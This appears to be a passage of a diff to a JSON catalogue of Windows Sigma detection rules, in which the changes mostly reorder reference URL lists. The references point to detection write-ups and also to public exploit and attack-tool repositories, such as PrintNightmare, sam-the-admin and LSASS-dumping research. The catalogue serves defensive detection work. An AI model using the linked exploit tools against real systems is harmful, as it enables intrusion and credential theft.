"https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://securelist.com/faq-the-projectsauron-apt/75533/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" ], "tags": [ @@ -4298,9 +4298,9 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", "https://o365blog.com/post/adfs/", "https://github.com/Azure/SimuLand", - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" ], "tags": [ @@ -4683,8 +4683,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing", + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml" ], "tags": [ @@ -4710,8 +4710,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" ], "tags": [ @@ -4921,9 +4921,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" ], "tags": "No established tags" @@ -4973,8 +4973,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", "https://attack.mitre.org/software/S0359/", + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" ], "tags": [ @@ -5034,8 +5034,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/mattifestation/status/899646620148539397", "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://twitter.com/mattifestation/status/899646620148539397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" ], "tags": [ @@ -5090,8 +5090,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.secureworks.com/blog/ransomware-as-a-distraction", "https://twitter.com/menasec1/status/1106899890377052160", + "https://www.secureworks.com/blog/ransomware-as-a-distraction", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" ], "tags": [ @@ -5229,9 +5229,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", + "https://github.com/sensepost/ruler/issues/47", "https://github.com/sensepost/ruler", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", - "https://github.com/sensepost/ruler/issues/47", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" ], @@ -5463,8 +5463,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" ], @@ -5534,8 +5534,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", - "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", + "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" ], "tags": [ @@ -5559,9 +5559,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" ], "tags": [ @@ -5692,8 +5692,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1207671369963646976", "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" ], "tags": [ @@ -5963,15 +5963,15 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_group_modification_logging.yml" ], "tags": "No established tags" @@ -6041,8 +6041,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", + "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" ], "tags": [ @@ -6099,9 +6099,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/fox-it/LDAPFragger", "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", - "https://github.com/fox-it/LDAPFragger", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" ], "tags": [ @@ -6270,9 +6270,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", "https://twitter.com/gentilkiwi/status/1003236624925413376", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" ], "tags": [ @@ -6338,8 +6338,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", "https://twitter.com/matthewdunwoody/status/1352356685982146562", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml" ], "tags": [ @@ -6410,8 +6410,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", - "Live environment caused by malware", "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", + "Live environment caused by malware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" ], "tags": [ @@ -7106,10 +7106,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", - "https://twitter.com/SecurityJosh/status/1283027365770276866", "https://twitter.com/Flangvik/status/1283054508084473861", + "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + "https://twitter.com/SecurityJosh/status/1283027365770276866", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" ], "tags": [ @@ -7388,9 +7388,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", - "https://github.com/topotam/PetitPotam", "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", + "https://github.com/topotam/PetitPotam", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" ], "tags": [ @@ -7423,8 +7423,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" ], "tags": [ @@ -7799,8 +7799,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" ], "tags": [ @@ -7928,8 +7928,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", "https://github.com/zerosum0x0/CVE-2019-0708", + "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml" ], "tags": [ @@ -8160,10 +8160,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml" ], "tags": "No established tags" @@ -8214,15 +8214,15 @@ "logsource.product": "windows", "refs": [ "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", "https://twitter.com/_xpn_/status/1268712093928378368", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" ], "tags": [ @@ -8350,8 +8350,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", + "https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" ], "tags": [ @@ -8396,8 +8396,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://o365blog.com/post/hybridhealthagent/", "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", + "https://o365blog.com/post/hybridhealthagent/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" ], "tags": [ @@ -8601,8 +8601,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", + "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" ], "tags": [ @@ -8626,8 +8626,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", "https://twitter.com/duzvik/status/1269671601852813320", + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" ], "tags": [ @@ -8718,9 +8718,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" ], "tags": [ @@ -8744,9 +8744,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://msdn.microsoft.com/en-us/library/cc220234.aspx", "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", "https://adsecurity.org/?p=3466", - "https://msdn.microsoft.com/en-us/library/cc220234.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" ], "tags": [ @@ -8804,9 +8804,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1581300963650187264?", - "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", + "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", + "https://twitter.com/SBousseaden/status/1581300963650187264?", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" ], "tags": [ @@ -8874,9 +8874,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://www.sans.org/webcasts/119395", "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" ], "tags": [ @@ -8967,10 +8967,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", - "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" ], "tags": [ @@ -9157,8 +9157,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1511760068743766026", - "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", + "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" ], "tags": [ @@ -9349,8 +9349,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://goo.gl/PsqrhT", "https://twitter.com/JohnLaTwC/status/1004895028995477505", + "https://goo.gl/PsqrhT", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" ], "tags": [ @@ -9409,8 +9409,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", + "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" ], "tags": [ @@ -9631,8 +9631,8 @@ "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", - "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", + "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" ], "tags": [ @@ -9745,8 +9745,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://technet.microsoft.com/en-us/library/security/4022344", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" ], "tags": [ @@ -9781,8 +9781,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" ], "tags": [ @@ -9805,9 +9805,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml" ], "tags": [ @@ -9840,11 +9840,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/FlemmingRiis/status/1217147415482060800", - "https://nullsec.us/windows-event-log-audit-cve/", "https://www.youtube.com/watch?v=ebmW42YYveI", "https://twitter.com/DidierStevens/status/1217533958096924676", "https://twitter.com/VM_vivisector/status/1217190929330655232", + "https://nullsec.us/windows-event-log-audit-cve/", + "https://twitter.com/FlemmingRiis/status/1217147415482060800", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" ], "tags": [ @@ -9955,8 +9955,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" ], "tags": [ @@ -10002,9 +10002,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" ], "tags": [ @@ -10092,8 +10092,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", + "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" ], "tags": [ @@ -10117,8 +10117,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1539679555908141061", "https://twitter.com/j00sean/status/1537750439701225472", + "https://twitter.com/nas_bench/status/1539679555908141061", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" ], "tags": [ @@ -10141,8 +10141,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1483810148602814466", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://twitter.com/SBousseaden/status/1483810148602814466", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" ], "tags": [ @@ -10165,8 +10165,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/wdormann/status/1590434950335320065", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://twitter.com/wdormann/status/1590434950335320065", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml" ], "tags": [ @@ -10233,8 +10233,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/moti_b/status/1032645458634653697", "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", + "https://twitter.com/moti_b/status/1032645458634653697", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" ], "tags": [ @@ -10258,9 +10258,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/afwu/PrintNightmare", - "https://twitter.com/KevTheHermit/status/1410203844064301056", "https://github.com/hhlxf/PrintNightmare", + "https://twitter.com/KevTheHermit/status/1410203844064301056", + "https://github.com/afwu/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml" ], "tags": [ @@ -10308,10 +10308,10 @@ "logsource.product": "windows", 